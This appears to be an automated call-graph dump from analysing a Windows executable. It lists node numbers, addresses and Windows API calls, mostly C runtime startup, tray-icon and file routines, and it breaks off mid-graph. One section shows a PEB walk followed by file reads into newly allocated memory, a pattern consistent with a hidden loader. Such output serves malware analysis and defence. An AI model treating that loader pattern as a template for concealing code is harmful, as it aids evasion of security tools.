4299c4 CreateFileW 85126->85127 85126->85128 85127->85128 85129 4299ea 85127->85129 85128->85071 85238 40e0d0 SetFilePointerEx SetFilePointerEx 85129->85238 85131 4299f5 85131->85128 85198 45335b 76 API calls 85132->85198 85134 463c5d 85199 442c52 80 API calls _wcslen 85134->85199 85136 463c72 85144 463cac 85136->85144 85200 40c060 85136->85200 85141 463ca4 85206 40c740 85141->85206 85143 463cf7 85143->85087 85144->85143 85211 462f5a 87 API calls __wcsicoll 85144->85211 85146 453063 111 API calls 85145->85146 85147 463d99 85146->85147 85148 463de0 85147->85148 85149 463dca 85147->85149 85220 40c760 78 API calls 85148->85220 85219 453081 111 API calls 85149->85219 85152 463dd0 LoadLibraryW 85161 463e09 85152->85161 85153 463de7 85157 463e19 85153->85157 85221 40c760 78 API calls 85153->85221 85154 463e3e 85159 463e4e 85154->85159 85160 463e7b 85154->85160 85156 463dfb 85156->85157 85222 40c760 78 API calls 85156->85222 85157->85093 85223 40d500 75 API calls 85159->85223 85225 40c760 78 API calls 85160->85225 85161->85154 85161->85157 85164 463e57 85224 45efe7 77 API calls ctype 85164->85224 85165 463e82 GetProcAddress 85168 463e90 85165->85168 85167 463e62 GetProcAddress 85170 463e79 85167->85170 85168->85157 85169 463edf 85168->85169 85168->85170 85169->85157 85172 463eef FreeLibrary 85169->85172 85170->85168 85226 403470 75 API calls _memcpy_s 85170->85226 85172->85157 85173 463eb4 85227 40d500 75 API calls 85173->85227 85175 463ebd 85228 45efe7 77 API calls ctype 85175->85228 85177 463ec8 GetProcAddress 85229 401330 ctype 85177->85229 85180 457a4c 85179->85180 85183 45785f _strcat _wcslen _wcscpy ctype 85179->85183 85187 410d40 85180->85187 85181 443576 78 API calls 85181->85183 85182 40c760 78 API calls 85182->85183 85183->85180 85183->85181 85183->85182 85184 4138ba 67 API calls _malloc 85183->85184 85185 453081 111 API calls 85183->85185 85230 40f580 85183->85230 85184->85183 85185->85183 85188 410d55 85187->85188 85189 410ded VirtualProtect 85188->85189 85190 410dbb 85188->85190 85189->85190 85190->85108 85190->85109 85191->85105 85192->85112 85193->85113 85194->85116 85195->85120 85196->85120 85197->85120 85198->85134 85199->85136 85201 41171a 75 API calls 85200->85201 85202 40c088 85201->85202 85203 41171a 75 API calls 85202->85203 85204 40c096 85203->85204 85205 4608ce 75 API calls _memcpy_s 85204->85205 85205->85141 85207 40c752 85206->85207 85208 40c747 85206->85208 85207->85144 85208->85207 85212 402ae0 85208->85212 85210 42a572 _memcpy_s 85210->85144 85211->85143 85213 42a06a 85212->85213 85214 402aef 85212->85214 85215 401380 75 API calls 85213->85215 85214->85210 85216 42a072 85215->85216 85217 41171a 75 API calls 85216->85217 85218 42a095 _memcpy_s 85217->85218 85218->85210 85219->85152 85220->85153 85221->85156 85222->85161 85223->85164 85224->85167 85225->85165 85226->85173 85227->85175 85228->85177 85229->85169 85231 429440 85230->85231 85232 40f589 _wcslen 85230->85232 85233 40f58f WideCharToMultiByte 85232->85233 85234 40f5d8 85233->85234 85235 40f5ad 85233->85235 85234->85183 85236 41171a 75 API calls 85235->85236 85237 40f5bb WideCharToMultiByte 85236->85237 85237->85183 85238->85131 85239 4034b0 85240 4034b9 85239->85240 85241 4034bd 85239->85241 85242 41171a 75 API calls 85241->85242 85243 42a0ba 85241->85243 85244 4034fe _memcpy_s ctype 85242->85244 85245 3f949ab 85248 3f94620 85245->85248 85247 3f949f7 85261 3f92050 85248->85261 85250 3f946bf 85253 3f94719 VirtualAlloc 85250->85253 85258 3f946fd 85250->85258 85259 3f94820 CloseHandle 85250->85259 85260 3f94830 VirtualFree 85250->85260 85264 3f95530 GetPEB 85250->85264 85252 3f946f0 CreateFileW 85252->85250 85252->85258 85254 3f9473a ReadFile 85253->85254 85253->85258 85255 3f94758 VirtualAlloc 85254->85255 85254->85258 85255->85250 85255->85258 85256 3f9491a 85256->85247 85257 3f9490c VirtualFree 85257->85256 85258->85256 85258->85257 85259->85250 85260->85250 85266 3f954d0 GetPEB 85261->85266 85263 3f926db 85263->85250 85265 3f9555a 85264->85265 85265->85252 85267 3f954fa 85266->85267 85267->85263 85268 416193 85305 41718c 85268->85305 85270 41619f GetStartupInfoW 85273 4161c2 85270->85273 85306 41aa31 HeapCreate 85273->85306 85274 416212 85308 416e29 GetModuleHandleW 85274->85308 85278 416223 __RTC_Initialize 85342 41b669 85278->85342 85281 416231 85282 41623d GetCommandLineW 85281->85282 85411 4117af 67 API calls 3 library calls 85281->85411 85357 42235f GetEnvironmentStringsW 85282->85357 85285 41623c 85285->85282 85286 41624c 85363 4222b1 GetModuleFileNameW 85286->85363 85288 416256 85289 416261 85288->85289 85412 4117af 67 API calls 3 library calls 85288->85412 85367 422082 85289->85367 85293 416272 85380 41186e 85293->85380 85296 416279 85298 416284 __wwincmdln 85296->85298 85414 4117af 67 API calls 3 library calls 85296->85414 85386 40d7f0 85298->85386 85301 4162b3 85416 411a4b 67 API calls _doexit 85301->85416 85304 4162b8 __locking 85305->85270 85307 416206 85306->85307 85307->85274 85409 41616a 67 API calls 3 library calls 85307->85409 85309 416e44 85308->85309 85310 416e3d 85308->85310 85311 416fac 85309->85311 85312 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 85309->85312 85417 41177f Sleep GetModuleHandleW 85310->85417 85427 416ad5 70 API calls 2 library calls 85311->85427 85315 416e97 TlsAlloc 85312->85315 85314 416e43 85314->85309 85318 416218 85315->85318 85319 416ee5 TlsSetValue 85315->85319 85318->85278 85410 41616a 67 API calls 3 library calls 85318->85410 85319->85318 85320 416ef6 85319->85320 85418 411a69 6 API calls 4 library calls 85320->85418 85322 416efb 85323 41696e __encode_pointer 6 API calls 85322->85323 85324 416f06 85323->85324 85325 41696e __encode_pointer 6 API calls 85324->85325 85326 416f16 85325->85326 85327 41696e __encode_pointer 6 API calls 85326->85327 85328 416f26 85327->85328 85329 41696e __encode_pointer 6 API calls 85328->85329 85330 416f36 85329->85330 85419 41828b InitializeCriticalSectionAndSpinCount ___lock_fhandle 85330->85419 85332 416f43 85332->85311 85333 4169e9 __decode_pointer 6 API calls 85332->85333 85334 416f57 85333->85334 85334->85311 85420 416ffb 85334->85420 85337 4169e9 __decode_pointer 6 API calls 85338 416f8a 85337->85338 85338->85311 85339 416f91 85338->85339 85426 416b12 67 API calls 5 library calls 85339->85426 85341 416f99 GetCurrentThreadId 85341->85318 85446 41718c 85342->85446 85344 41b675 GetStartupInfoA 85345 416ffb __calloc_crt 67 API calls 85344->85345 85352 41b696 85345->85352 85346 41b8b4 __locking 85346->85281 85347 41b831 GetStdHandle 85351 41b7fb 85347->85351 85348 41b896 SetHandleCount 85348->85346 85349 416ffb __calloc_crt 67 API calls 85349->85352 85350 41b843 GetFileType 85350->85351 85351->85346 85351->85347 85351->85348 85351->85350 85448 4189e6 InitializeCriticalSectionAndSpinCount __locking 85351->85448 85352->85346 85352->85349 85352->85351 85353 41b77e 85352->85353 85353->85346 85353->85351 85354 41b7a7 GetFileType 85353->85354 85447 4189e6 InitializeCriticalSectionAndSpinCount __locking 85353->85447 85354->85353 85358 422370 85357->85358 85359 422374 85357->85359 85358->85286 85360 416fb6 __malloc_crt 67 API calls 85359->85360 85362 422395 _memcpy_s 85360->85362 85361 42239c FreeEnvironmentStringsW 85361->85286 85362->85361 85364 4222e6 _wparse_cmdline 85363->85364 85365 416fb6 __malloc_crt 67 API calls 85364->85365 85366 422329 _wparse_cmdline 85364->85366 85365->85366 85366->85288 85368 42209a _wcslen 85367->85368 85372 416267 85367->85372 85369 416ffb __calloc_crt 67 API calls 85368->85369 85377 4220be _wcslen 85369->85377 85370 422123 85371 413a88 __output_l 67 API calls 85370->85371 85371->85372 85372->85293 85413 4117af 67 API calls 3 library calls 85372->85413 85373 416ffb __calloc_crt 67 API calls 85373->85377 85374 422149 85376 413a88 __output_l 67 API calls 85374->85376 85376->85372 85377->85370 85377->85372 85377->85373 85377->85374 85378 422108 85377->85378 85449 426349 67 API calls __fptostr 85377->85449 85378->85377 85450 417d93 10 API calls 3 library calls 85378->85450 85381 41187c __IsNonwritableInCurrentImage 85380->85381 85451 418486 85381->85451 85383 41189a __initterm_e 85384 411421 __cinit 74 API calls 85383->85384 85385 4118b9 __IsNonwritableInCurrentImage __initterm 85383->85385 85384->85385 85385->85296 85387 431bcb 85386->85387 85388 40d80c 85386->85388 85389 4092c0 VariantClear 85388->85389 85390 40d847 85389->85390 85455 40eb50 85390->85455 85395 40d888 85459 411b24 67 API calls __fptostr 85395->85459 85397 40d877 85458 411ac6 67 API calls 4 library calls 85397->85458 85398 40d891 85460 40f370 SystemParametersInfoW SystemParametersInfoW 85398->85460 85400 40d89f 85461 40d6d0 GetCurrentDirectoryW 85400->85461 85402 40d8a7 SystemParametersInfoW 85403 40d8d4 85402->85403 85404 40d8cd FreeLibrary 85402->85404 85405 4092c0 VariantClear 85403->85405 85404->85403 85406 40d8dd 85405->85406 85407 4092c0 VariantClear 85406->85407 85408 40d8e6 85407->85408 85408->85301 85415 411a1f 67 API calls _doexit 85408->85415 85409->85274 85410->85278 85411->85285 85412->85289 85413->85293 85414->85298 85415->85301 85416->85304 85417->85314 85418->85322 85419->85332 85423 417004 85420->85423 85422 416f70 85422->85311 85422->85337 85423->85422 85424 417022 Sleep 85423->85424 85428 422452 85423->85428 85425 417037 85424->85425 85425->85422 85425->85423 85426->85341 85427->85318 85429 42245e __locking 85428->85429 85430 422476 85429->85430 85438 422495 _memset 85429->85438 85441 417f23 67 API calls __getptd_noexit 85430->85441 85432 42247b 85442 417ebb 6 API calls 2 library calls 85432->85442 85434 422507 HeapAlloc 85434->85438 85436 418407 __lock 66 API calls 85436->85438 85437 42248b __locking 85437->85423 85438->85434 85438->85436 85438->85437 85443 41a74c 5 API calls 2 library calls 85438->85443 85444 42254e LeaveCriticalSection _doexit 85438->85444 85445 411afc 6 API calls __decode_pointer 85438->85445 85441->85432 85443->85438 85444->85438 85445->85438 85446->85344 85447->85353 85448->85351 85449->85377 85450->85378 85453 41848c 85451->85453 85452 41696e __encode_pointer 6 API calls 85452->85453 85453->85452 85454 4184a4 85453->85454 85454->85383 85499 40eb70 85455->85499 85458->85395 85459->85398 85460->85400 85503 401f80 85461->85503 85463 40d6f1 IsDebuggerPresent 85464 431a9d MessageBoxA 85463->85464 85465 40d6ff 85463->85465 85466 431ab6 85464->85466 85465->85466 85467 40d71f 85465->85467 85605 403e90 75 API calls 3 library calls 85466->85605 85573 40f3b0 85467->85573 85470 40d77a 85474 40d782 85470->85474 85475 431b09 SetCurrentDirectoryW 85470->85475 85472 40d73a GetFullPathNameW 85603 401440 127 API calls _wcscat 85472->85603 85476 40d78b 85474->85476 85606 43604b 6 API calls 85474->85606 85475->85474 85585 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 85476->85585 85480 431b28 85480->85476 85482 431b30 GetModuleFileNameW 85480->85482 85484 431ba4 GetForegroundWindow ShellExecuteW 85482->85484 85485 431b4c 85482->85485 85483 40d795 85493 40d7a8 85483->85493 85593 40e1e0 85483->85593 85487 40d7c7 85484->85487 85607 401b70 85485->85607 85491 40d7d1 SetCurrentDirectoryW 85487->85491 85491->85402 85492 431b66 85614 40d3b0 75 API calls 2 library calls 85492->85614 85493->85487 85604 401000 Shell_NotifyIconW _memset 85493->85604 85496 431b72 GetForegroundWindow ShellExecuteW 85497 431b9f 85496->85497 85497->85487 85498 40eba0 LoadLibraryA GetProcAddress 85498->85397 85500 40d86e 85499->85500 85501 40eb76 LoadLibraryA 85499->85501 85500->85397 85500->85498 85501->85500 85502 40eb87 GetProcAddress 85501->85502 85502->85500 85615 40e680 85503->85615 85507 401fa2 GetModuleFileNameW 85633 40ff90 85507->85633 85509 401fbd 85645 4107b0 85509->85645 85512 401b70 75 API calls 85513 401fe4 85512->85513 85648 4019e0 85513->85648 85515 401ff2 85516 4092c0 VariantClear 85515->85516 85517 402002 85516->85517 85518 401b70 75 API calls 85517->85518 85519 40201c 85518->85519 85520 4019e0 76 API calls 85519->85520 85521 40202c 85520->85521 85522 401b70 75 API calls 85521->85522 85523 40203c 85522->85523 85656 40c3e0 85523->85656 85525 40204d 85526 40c060 75 API calls 85525->85526 85527 402061 85526->85527 85674 401a70 85527->85674 85529 40206e 85681 4115d0 85529->85681 85532 42c174 85534 401a70 75 API calls 85532->85534 85533 402088 85535 4115d0 __wcsicoll 79 API calls 85533->85535 85536 42c189 85534->85536 85537 402093 85535->85537 85539 401a70 75 API calls 85536->85539 85537->85536 85538 40209e 85537->85538 85540 4115d0 __wcsicoll 79 API calls 85538->85540 85541 42c1a7 85539->85541 85542 4020a9 85540->85542 85543 42c1b0 GetModuleFileNameW 85541->85543 85542->85543 85544 4020b4 85542->85544 85546 401a70 75 API calls 85543->85546 85545 4115d0 __wcsicoll 79 API calls 85544->85545 85547 4020bf 85545->85547 85548 42c1e2 85546->85548 85549 402107 85547->85549 85554 401a70 75 API calls 85547->85554 85556 42c20a _wcscpy 85547->85556 85693 40df50 75 API calls 85548->85693 85551 402119 85549->85551 85549->85556 85553 42c243 85551->85553 85689 40e7e0 76 API calls 85551->85689 85552 42c1f1 85555 401a70 75 API calls 85552->85555 85558 4020e5 _wcscpy 85554->85558 85559 42c201 85555->85559 85560 401a70 75 API calls 85556->85560 85563 401a70 75 API calls 85558->85563 85559->85556 85568 402148 85560->85568 85561 402132 85690 40d030 76 API calls 85561->85690 85563->85549 85564 40213e 85565 4092c0 VariantClear 85564->85565 85565->85568 85566 402184 85570 4092c0 VariantClear 85566->85570 85568->85566 85571 401a70 75 API calls 85568->85571 85691 40d030 76 API calls 85568->85691 85692 40e640 76 API calls 85568->85692 85572 402196 ctype 85570->85572 85571->85568 85572->85463 85574 42ccf4 _memset 85573->85574 85575 40f3c9 85573->85575 85577 42cd05 GetOpenFileNameW 85574->85577 86375 40ffb0 76 API calls ctype 85575->86375 85577->85575 85579 40d732 85577->85579 85578 40f3d2 86376 410130 SHGetMalloc 85578->86376 85579->85470 85579->85472 85581 40f3d9 86381 410020 88 API calls __wcsicoll 85581->86381 85583 40f3e7 86382 40f400 85583->86382 85586 42b9d3 85585->85586 85587 41025a LoadImageW RegisterClassExW 85585->85587 86427 443e8f EnumResourceNamesW LoadImageW 85586->86427 86426 4102f0 7 API calls 85587->86426 85590 40d790 85592 4103e0 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 85590->85592 85591 42b9da 85592->85483 85594 40e207 _memset 85593->85594 85595 40e262 85594->85595 85597 42aa14 DestroyIcon 85594->85597 85596 40e2a4 85595->85596 86450 43737d 84 API calls __wcsicoll 85595->86450 85599 40e2c0 Shell_NotifyIconW 85596->85599 85600 42aa50 Shell_NotifyIconW 85596->85600 85597->85595 86428 401be0 85599->86428 85602 40e2da 85602->85493 85603->85470 85604->85487 85605->85470 85606->85480 85608 401b76 _wcslen 85607->85608 85609 41171a 75 API calls 85608->85609 85611 401bc5 85608->85611 85610 401bad _memcpy_s 85609->85610 85612 41171a 75 API calls 85610->85612 85613 40d3b0 75 API calls 2 library calls 85611->85613 85612->85611 85613->85492 85614->85496 85616 40c060 75 API calls 85615->85616 85617 401f90 85616->85617 85618 402940 85617->85618 85619 40294a __write_nolock 85618->85619 85694 4021e0 85619->85694 85622 402972 85626 4029a4 85622->85626 85706 401cf0 85622->85706 85623 402ae0 75 API calls 85623->85626 85624 402abe 85624->85507 85625 402a8c 85625->85624 85627 401b70 75 API calls 85625->85627 85626->85623 85626->85625 85628 401b70 75 API calls 85626->85628 85632 401cf0 75 API calls 85626->85632 85709 40d970 75 API calls 2 library calls 85626->85709 85629 402ab3 85627->85629 85628->85626 85710 40d970 75 API calls 2 library calls 85629->85710 85632->85626 85712 40f5e0 85633->85712 85636 40ffa6 85636->85509 85638 42b6d8 85639 42b6e6 85638->85639 85768 434fe1 85638->85768 85641 413a88 __output_l 67 API calls 85639->85641 85642 42b6f5 85641->85642 85643 434fe1 106 API calls 85642->85643 85644 42b702 85643->85644 85644->85509 85646 41171a 75 API calls 85645->85646 85647 401fd6 85646->85647 85647->85512 85649 401a03 85648->85649 85653 4019e5 85648->85653 85650 401a1a 85649->85650 85649->85653 86364 404260 76 API calls 85650->86364 85652 4019ff 85652->85515 85653->85652 86363 404260 76 API calls 85653->86363 85655 401a26 85655->85515 85657 40c3e4 85656->85657 85658 40c42c 85656->85658 85661 40c3f0 85657->85661 85662 42a475 85657->85662 85659 42a422 85658->85659 85660 40c435 85658->85660 85665 42a427 85659->85665 85666 42a445 85659->85666 85663 40c441 85660->85663 85670 42a455 85660->85670 86365 4042f0 75 API calls __cinit 85661->86365 86370 453155 75 API calls 85662->86370 86366 4042f0 75 API calls __cinit 85663->86366 85673 40c3fb 85665->85673 86367 453155 75 API calls 85665->86367 86368 453155 75 API calls 85666->86368 86369 453155 75 API calls 85670->86369 85673->85525 85673->85673 85675 401a90 85674->85675 85676 401a77 85674->85676 85678 4021e0 75 API calls 85675->85678 85677 401a8d 85676->85677 86371 404080 75 API calls _memcpy_s 85676->86371 85677->85529 85680 401a9c 85678->85680 85680->85529 85682 4115e1 85681->85682 85683 411650 85681->85683 85686 40207d 85682->85686 86372 417f23 67 API calls __getptd_noexit 85682->86372 86374 4114bf 79 API calls 3 library calls 85683->86374 85686->85532 85686->85533 85687 4115ed 86373 417ebb 6 API calls 2 library calls 85687->86373 85689->85561 85690->85564 85691->85568 85692->85568 85693->85552 85695 4021f1 _wcslen 85694->85695 85696 42a598 85694->85696 85699 402205 85695->85699 85700 402226 85695->85700 85697 40c740 75 API calls 85696->85697 85698 42a5a2 85697->85698 85711 404020 75 API calls ctype 85699->85711 85701 401380 75 API calls 85700->85701 85703 40222d 85701->85703 85703->85698 85705 41171a 75 API calls 85703->85705 85704 40220c _memcpy_s 85704->85622 85705->85704 85707 402ae0 75 API calls 85706->85707 85708 401cf7 85707->85708 85708->85622 85709->85626 85710->85624 85711->85704 85713 40f580 77 API calls 85712->85713 85714 40f5f8 _strcat ctype 85713->85714 85772 40f6d0 85714->85772 85719 42b2ee 85801 4151b0 85719->85801 85721 40f679 85721->85719 85723 40f681 85721->85723 85788 414e94 85723->85788 85727 40f68b 85727->85636 85731 452574 85727->85731 85728 42b31d 85807 415484 85728->85807 85730 42b33d 85732 41557c _fseek 105 API calls 85731->85732 85733 4525df 85732->85733 86308 4523ce 85733->86308 85736 4525fc 85736->85638 85737 4151b0 __fread_nolock 81 API calls 85738 45261d 85737->85738 85739 4151b0 __fread_nolock 81 API calls 85738->85739 85740 45262e 85739->85740 85741 4151b0 __fread_nolock 81 API calls 85740->85741 85742 452649 85741->85742 85743 4151b0 __fread_nolock 81 API calls 85742->85743 85744 452666 85743->85744 85745 41557c _fseek 105 API calls 85744->85745 85746 452682 85745->85746 85747 4138ba _malloc 67 API calls 85746->85747 85748 45268e 85747->85748 85749 4138ba _malloc 67 API calls 85748->85749 85750 45269b 85749->85750 85751 4151b0 __fread_nolock 81 API calls 85750->85751 85752 4526ac 85751->85752 85753 44afdc GetSystemTimeAsFileTime 85752->85753 85754 4526bf 85753->85754 85755 4526d5 85754->85755 85756 4526fd 85754->85756 85759 413a88 __output_l 67 API calls 85755->85759 85757 452704 85756->85757 85758 45275b 85756->85758 86314 44b195 85757->86314 85761 413a88 __output_l 67 API calls 85758->85761 85762 4526df 85759->85762 85764 452759 85761->85764 85765 413a88 __output_l 67 API calls 85762->85765 85763 452753 85766 413a88 __output_l 67 API calls 85763->85766 85764->85638 85767 4526e8 85765->85767 85766->85764 85767->85638 85769 434feb 85768->85769 85771 434ff1 85768->85771 85770 414e94 __fcloseall 106 API calls 85769->85770 85770->85771 85771->85639 85773 40f6dd _strlen 85772->85773 85820 40f790 85773->85820 85776 414e06 85839 414d40 85776->85839 85778 40f666 85778->85719 85779 40f450 85778->85779 85783 40f45a _strcat _memcpy_s __write_nolock 85779->85783 85780 4151b0 __fread_nolock 81 API calls 85780->85783 85781 40f531 85781->85721 85783->85780 85783->85781 85786 42936d 85783->85786 85922 41557c 85783->85922 85784 41557c _fseek 105 API calls 85785 429394 85784->85785 85787 4151b0 __fread_nolock 81 API calls 85785->85787 85786->85784 85787->85781 85789 414ea0 __locking 85788->85789 85790 414eb4 85789->85790 85792 414ed1 85789->85792 86061 417f23 67 API calls __getptd_noexit 85790->86061 85793 415965 __lock_file 68 API calls 85792->85793 85797 414ec9 __locking 85792->85797 85795 414ee9 85793->85795 85794 414eb9 86062 417ebb 6 API calls 2 library calls 85794->86062 86045 414e1d 85795->86045 85797->85727 86130 41511a 85801->86130 85803 4151c8 85804 44afdc 85803->85804 86301 4431e0 85804->86301 85806 44affd 85806->85728 85808 415490 __locking 85807->85808 85809 4154bb 85808->85809 85810 41549e 85808->85810 85811 415965 __lock_file 68 API calls 85809->85811 86305 417f23 67 API calls __getptd_noexit 85810->86305 85813 4154c3 85811->85813 85815 4152e7 __ftell_nolock 71 API calls 85813->85815 85814 4154a3 86306 417ebb 6 API calls 2 library calls 85814->86306 85817 4154cf 85815->85817 86307 4154e8 LeaveCriticalSection LeaveCriticalSection __wfsopen 85817->86307 85819 4154b3 __locking 85819->85730 85821 40f7ae _memset 85820->85821 85823 40f628 85821->85823 85824 415258 85821->85824 85823->85776 85825 415285 85824->85825 85826 415268 85824->85826 85825->85826 85828 41528c 85825->85828 85835 417f23 67 API calls __getptd_noexit 85826->85835 85837 41c551 103 API calls 12 library calls 85828->85837 85829 41526d 85836 417ebb 6 API calls 2 library calls 85829->85836 85832 4152b2 85833 41527d 85832->85833 85838 4191c9 101 API calls 7 library calls 85832->85838 85833->85821 85835->85829 85837->85832 85838->85833 85840 414d4c __locking 85839->85840 85841 414d5f 85840->85841 85843 414d95 85840->85843 85891 417f23 67 API calls __getptd_noexit 85841->85891 85858 41e28c 85843->85858 85844 414d64 85892 417ebb 6 API calls 2 library calls 85844->85892 85847 414d9a 85848 414da1 85847->85848 85849 414dae 85847->85849 85893 417f23 67 API calls __getptd_noexit 85848->85893 85851 414dd6 85849->85851 85852 414db6 85849->85852 85876 41dfd8 85851->85876 85894 417f23 67 API calls __getptd_noexit 85852->85894 85856 414d74 __locking @_EH4_CallFilterFunc@8 85856->85778 85859 41e298 __locking 85858->85859 85860 418407 __lock 67 API calls 85859->85860 85871 41e2a6 85860->85871 85861 41e31b 85896 41e3bb 85861->85896 85862 41e322 85864 416fb6 __malloc_crt 67 API calls 85862->85864 85866 41e32c 85864->85866 85865 41e3b0 __locking 85865->85847 85866->85861 85901 4189e6 InitializeCriticalSectionAndSpinCount __locking 85866->85901 85868 418344 __mtinitlocknum 67 API calls 85868->85871 85870 41e351 85872 41e35c 85870->85872 85873 41e36f EnterCriticalSection 85870->85873 85871->85861 85871->85862 85871->85868 85899 4159a6 68 API calls __lock 85871->85899 85900 415a14 LeaveCriticalSection LeaveCriticalSection _doexit 85871->85900 85875 413a88 __output_l 67 API calls 85872->85875 85873->85861 85875->85861 85884 41dffb __wopenfile 85876->85884 85877 41e015 85906 417f23 67 API calls __getptd_noexit 85877->85906 85879 41e01a 85907 417ebb 6 API calls 2 library calls 85879->85907 85881 41e247 85903 425db0 85881->85903 85884->85877 85884->85884 85890 41e1e9 85884->85890 85908 4136bc 79 API calls 2 library calls 85884->85908 85886 41e1e2 85886->85890 85909 4136bc 79 API calls 2 library calls 85886->85909 85888 41e201 85888->85890 85910 4136bc 79 API calls 2 library calls 85888->85910 85890->85877 85890->85881 85891->85844 85893->85856 85894->85856 85895 414dfc LeaveCriticalSection LeaveCriticalSection __wfsopen 85895->85856 85902 41832d LeaveCriticalSection 85896->85902 85898 41e3c2 85898->85865 85899->85871 85900->85871 85901->85870 85902->85898 85911 425ce4 85903->85911 85905 414de1 85905->85895 85906->85879 85908->85886 85909->85888 85910->85890 85912 425cf0 __locking 85911->85912 85913 425d03 85912->85913 85915 425d41 85912->85915 85914 417f23 __fptostr 67 API calls 85913->85914 85916 425d08 85914->85916 85917 4255c4 __tsopen_nolock 132 API calls 85915->85917 85918 417ebb __fptostr 6 API calls 85916->85918 85919 425d5b 85917->85919 85921 425d17 __locking 85918->85921 85920 425d82 __sopen_helper LeaveCriticalSection 85919->85920 85920->85921 85921->85905 85926 415588 __locking 85922->85926 85923 415596 85953 417f23 67 API calls __getptd_noexit 85923->85953 85925 4155c4 85935 415965 85925->85935 85926->85923 85926->85925 85928 41559b 85954 417ebb 6 API calls 2 library calls 85928->85954 85934 4155ab __locking 85934->85783 85936 415977 85935->85936 85937 415999 EnterCriticalSection 85935->85937 85936->85937 85939 41597f 85936->85939 85938 4155cc 85937->85938 85941 4154f2 85938->85941 85940 418407 __lock 67 API calls 85939->85940 85940->85938 85942 415512 85941->85942 85943 415502 85941->85943 85945 415524 85942->85945 85956 4152e7 85942->85956 86010 417f23 67 API calls __getptd_noexit 85943->86010 85973 41486c 85945->85973 85946 415507 85955 4155f7 LeaveCriticalSection LeaveCriticalSection __wfsopen 85946->85955 85953->85928 85955->85934 85957 41531a 85956->85957 85958 4152fa 85956->85958 85960 41453a __fileno 67 API calls 85957->85960 86011 417f23 67 API calls __getptd_noexit 85958->86011 85962 415320 85960->85962 85961 4152ff 86012 417ebb 6 API calls 2 library calls 85961->86012 85964 41efd4 __locking 71 API calls 85962->85964 85965 415335 85964->85965 85966 4153a9 85965->85966 85968 415364 85965->85968 85972 41530f 85965->85972 86013 417f23 67 API calls __getptd_noexit 85966->86013 85969 41efd4 __locking 71 API calls 85968->85969 85968->85972 85970 415404 85969->85970 85971 41efd4 __locking 71 API calls 85970->85971 85970->85972 85971->85972 85972->85945 85974 414885 85973->85974 85978 4148a7 85973->85978 85975 41453a __fileno 67 API calls 85974->85975 85974->85978 85976 4148a0 85975->85976 86014 41c3cf 101 API calls 4 library calls 85976->86014 85979 41453a 85978->85979 85980 414549 85979->85980 85982 41455e 85979->85982 86015 417f23 67 API calls __getptd_noexit 85980->86015 85985 41efd4 85982->85985 85983 41454e 86016 417ebb 6 API calls 2 library calls 85983->86016 85986 41efe0 __locking 85985->85986 85987 41f003 85986->85987 85988 41efe8 85986->85988 85989 41f011 85987->85989 85994 41f052 85987->85994 86037 417f36 67 API calls __getptd_noexit 85988->86037 86039 417f36 67 API calls __getptd_noexit 85989->86039 85992 41efed 86038 417f23 67 API calls __getptd_noexit 85992->86038 85993 41f016 86040 417f23 67 API calls __getptd_noexit 85993->86040 86017 41ba3b 85994->86017 85998 41f01d 86041 417ebb 6 API calls 2 library calls 85998->86041 85999 41f058 86001 41f065 85999->86001 86002 41f07b 85999->86002 86027 41ef5f 86001->86027 86042 417f23 67 API calls __getptd_noexit 86002->86042 86004 41eff5 __locking 86004->85946 86006 41f080 86043 417f36 67 API calls __getptd_noexit 86006->86043 86007 41f073 86044 41f0a6 LeaveCriticalSection __unlock_fhandle 86007->86044 86010->85946 86011->85961 86013->85972 86014->85978 86015->85983 86018 41ba47 __locking 86017->86018 86019 41baa2 86018->86019 86022 418407 __lock 67 API calls 86018->86022 86020 41bac4 __locking 86019->86020 86021 41baa7 EnterCriticalSection 86019->86021 86020->85999 86021->86020 86023 41ba73 86022->86023 86024 41ba8a 86023->86024 86026 4189e6 ___lock_fhandle InitializeCriticalSectionAndSpinCount 86023->86026 86025 41bad2 ___lock_fhandle LeaveCriticalSection 86024->86025 86025->86019 86026->86024 86028 41b9c4 __close_nolock 67 API calls 86027->86028 86029 41ef6e 86028->86029 86030 41ef84 SetFilePointer 86029->86030 86031 41ef74 86029->86031 86033 41efa3 86030->86033 86034 41ef9b GetLastError 86030->86034 86032 417f23 __fptostr 67 API calls 86031->86032 86036 41ef79 86032->86036 86035 417f49 __dosmaperr 67 API calls 86033->86035 86033->86036 86034->86033 86035->86036 86036->86007 86037->85992 86038->86004 86039->85993 86040->85998 86042->86006 86043->86007 86044->86004 86046 414e31 86045->86046 86047 414e4d 86045->86047 86091 417f23 67 API calls __getptd_noexit 86046->86091 86048 414e46 86047->86048 86050 41486c __flush 101 API calls 86047->86050 86063 414f08 LeaveCriticalSection LeaveCriticalSection __wfsopen 86048->86063 86052 414e59 86050->86052 86051 414e36 86092 417ebb 6 API calls 2 library calls 86051->86092 86064 41e680 86052->86064 86056 41453a __fileno 67 API calls 86057 414e67 86056->86057 86068 41e5b3 86057->86068 86059 414e6d 86059->86048 86060 413a88 __output_l 67 API calls 86059->86060 86060->86048 86061->85794 86063->85797 86065 41e690 86064->86065 86066 414e61 86064->86066 86065->86066 86067 413a88 __output_l 67 API calls 86065->86067 86066->86056 86067->86066 86069 41e5bf __locking 86068->86069 86070 41e5e2 86069->86070 86071 41e5c7 86069->86071 86073 41e5f0 86070->86073 86076 41e631 86070->86076 86108 417f36 67 API calls __getptd_noexit 86071->86108 86110 417f36 67 API calls __getptd_noexit 86073->86110 86074 41e5cc 86109 417f23 67 API calls __getptd_noexit 86074->86109 86079 41ba3b ___lock_fhandle 68 API calls 86076->86079 86078 41e5f5 86111 417f23 67 API calls __getptd_noexit 86078->86111 86081 41e637 86079->86081 86083 41e652 86081->86083 86084 41e644 86081->86084 86082 41e5fc 86112 417ebb 6 API calls 2 library calls 86082->86112 86113 417f23 67 API calls __getptd_noexit 86083->86113 86093 41e517 86084->86093 86088 41e5d4 __locking 86088->86059 86089 41e64c 86114 41e676 LeaveCriticalSection __unlock_fhandle 86089->86114 86091->86051 86115 41b9c4 86093->86115 86095 41e57d 86128 41b93e 68 API calls 2 library calls 86095->86128 86097 41e527 86097->86095 86099 41b9c4 __close_nolock 67 API calls 86097->86099 86107 41e55b 86097->86107 86098 41e585 86104 41e5a7 86098->86104 86129 417f49 67 API calls 3 library calls 86098->86129 86101 41e552 86099->86101 86100 41b9c4 __close_nolock 67 API calls 86102 41e567 CloseHandle 86100->86102 86105 